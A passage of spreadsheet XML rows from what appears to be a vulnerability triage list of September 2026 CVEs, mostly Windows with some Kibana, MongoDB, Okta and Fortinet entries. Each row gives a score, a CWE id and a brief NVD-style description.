        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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2" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78583</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security@elastic.co</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>elastic:kibana</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to privilege escalation via Input Data Manipulation (CAPEC-153). Elasticsearch cluster privilege declarations originating from integration packages were not validated before being used to mint credentials for enrolled Elastic Agents. A user holding Fleet management privileges could therefore cause every Elastic Agent on a targeted policy to receive a credential carrying arbitrarily elevated Elasticsearch cluster privileges, up to and including full cluster administration.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78583</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R116"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S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds read security issue exists in the query planning component of MongoDB Server. An authenticated user with database read and write privileges can trigger the security issue through crafted query operations, causing the server to read memory beyond allocated buffer boundaries. The revealed memory contents may be partially observable through diagnostic query statistics output.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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25" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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26" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
